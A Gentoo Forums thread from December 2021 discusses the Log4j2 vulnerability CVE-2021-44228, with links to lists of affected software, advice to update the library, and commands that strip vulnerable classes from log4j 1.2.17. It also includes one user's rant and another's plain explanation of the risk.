Gentoo Forums
Gentoo Forums
Gentoo Forums
Quick Search: in
Log4J2 CVE-2021-44228
View unanswered posts
View posts from last 24 hours

 
Reply to topic    Gentoo Forums Forum Index Networking & Security
View previous topic :: View next topic  
Author Message
halcon
l33t
l33t


Joined: 15 Dec 2019
Posts: 629

PostPosted: Tue Dec 14, 2021 8:51 pm    Post subject: Log4J2 CVE-2021-44228 Reply with quote

I see, nobody has posted this yet...

An important security vulnerability - in Log4J2, recently discovered, can affect a lot of applications:

https://github.com/NCSC-NL/log4shell/tree/main/software
_________________
A wife asks her husband, a programmer:
- Could you please go shopping for me and buy one carton of milk, and if they have eggs, get 6?
He comes back with 6 cartons of milk.
- Why did you buy 6 cartons of milk?
- They had eggs.
Back to top
View user's profile Send private message
Arctic5824
n00b
n00b


Joined: 04 Dec 2021
Posts: 23

PostPosted: Thu Dec 16, 2021 1:23 am    Post subject: Reply with quote

the only real way to prevent this is from java applications updating the log4j version used, if they are using an outdated version, as a fix has already been published.

some claim "java newer then 8 is safe from any rce regarding log4j" but this is simply not true.
Back to top
View user's profile Send private message
halcon
l33t
l33t


Joined: 15 Dec 2019
Posts: 629

PostPosted: Sat Dec 18, 2021 8:46 am    Post subject: Reply with quote

At least one vendor is completely not affected :)

https://forum.mikrotik.com/viewtopic.php?t=181257#p897948
_________________
A wife asks her husband, a programmer:
- Could you please go shopping for me and buy one carton of milk, and if they have eggs, get 6?
He comes back with 6 cartons of milk.
- Why did you buy 6 cartons of milk?
- They had eggs.
Back to top
View user's profile Send private message
fedeliallalinea
Administrator
Administrator


Joined: 08 Mar 2003
Posts: 30842
Location: here

PostPosted: Sat Dec 18, 2021 10:08 am    Post subject: Reply with quote

For old version 1.2.17 (is end of life version) is recommended to remove JMSAppender and SocketServer
Code:
$ zip -d log4j-1.2.17.jar org/apache/log4j/net/JMSAppender.class
$ zip -d log4j-1.2.17.jar org/apache/log4j/net/SocketServer.class

_________________
Questions are guaranteed in life; Answers aren't.
Back to top
View user's profile Send private message
technotorpedo
Apprentice
Apprentice


Joined: 10 Dec 2019
Posts: 151

PostPosted: Sat Dec 18, 2021 4:50 pm    Post subject: Reply with quote

Gotta rant a bit:

This makes me feel like wrapping at least 1 possibly 2 rolls of metal foil around my head. Still trying to wrap mind around this affair. I mean yeppers .. obviously serious, though oddly more I research this topic, less I understand it as think the web is flooded with clickbait by people who have no or very little idea what they're typing about, so can't clearly explain it to others. They just want to attract as many eyes with as much sensationalized web-content as they can crap out ...

My personal install(s) are safe enough ... errrr possibly I guess, quit using java plugins long before browser makers discontinued the practice, same for having anything JDK-JRE-etc installed, though mind boggling to think about all the ways this could still impact everybody online. The fate of the free(technologic) world can boil down to one of the 2 most popular logging frameworks for Apache/java, that's maintained by a handful of volunteers, web said the 3(UNPAID) maintainers of log4j2 have been scrambling non-stop to get patches out and the project page on apache.org shows there's 10 people with commit privileges for the codebase, no doubt also volunteers ...

Yet despite some big, big names in technology utilizing this, for a VERY long time, in a vast amount of applications, it's been around this long undiscovered ? Honestly am assigning this event to more NSA/Snowden type activity, while do get such things can happen, think they often have some help in happening for real. I mean silver lining it's drawing attention to vital open source projects being horribly underfunded etc etc. Though if the scope and seriousness of such an exploit is to be believed then yeah, kind of numbing overall.

Of course have seen people jumping on the opportunity to bash open source, yet again ... more than a few techno-giants widely used and missed this exploit, so they can't put it off on open source. Any people/techies here with a real grasp of this topic want to share your insights, how much is hype and overblown and how much of what's being said is for real ? Ah ... not going to waste the foil but would appreciate hearing from better qualified techies and your views about this ...
Back to top
View user's profile Send private message
Arctic5824
n00b
n00b


Joined: 04 Dec 2021
Posts: 23

PostPosted: Sun Dec 19, 2021 1:10 am    Post subject: Reply with quote

technotorpedo wrote:
how much is hype and overblown and how much of what's being said is for real ?

ive been programming java for 2-3 years, here is what I know.

Tons of apps still have RCE's, RCEs mean an attacker can run whatever code they want on exploited systems, this is massive, lots of apps are patched now, but not all.

most forms of this are server-side, this means users arent directly effected, some situations, like minecraft, users where directly effected (attackers could put malware on their computer or whatever they want)

Recently a new exploit was found to bypass the patch, this mess is happening all over again but this time silently with quick fixes, some fixes dont need to be patched (such as cleaning log text instead of just updating log4j)


Ive tested this exploit (ofc on situations where i have permission), its as the media describes it :/
Back to top
View user's profile Send private message
technotorpedo
Apprentice
Apprentice


Joined: 10 Dec 2019
Posts: 151

PostPosted: Sun Dec 19, 2021 3:22 am    Post subject: Reply with quote

Thanks for sharing your feedback on this mess ... Been up/down/sideways, with this and other junk. Am not some Nix-ninja, IT wizard, am an enduser whose happiest roaming around the web and dorking with gnu/nix, probably too much. Though is there any such thing as too much dorking w Linux ? Really who am I kidding, mulling over this type of subject matter, am pissed off and in a very foul mood. Time for a movie or something ...
Back to top
View user's profile Send private message
Display posts from previous:   
Reply to topic    Gentoo Forums Forum Index Networking & Security All times are GMT
Page 1 of 1

 
Jump to:  
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum